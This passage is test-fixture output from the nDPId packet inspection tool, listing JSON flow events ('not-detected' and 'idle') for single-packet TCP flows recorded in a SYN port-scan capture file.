+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060695,"flow_last_seen":1278275060695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9220,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 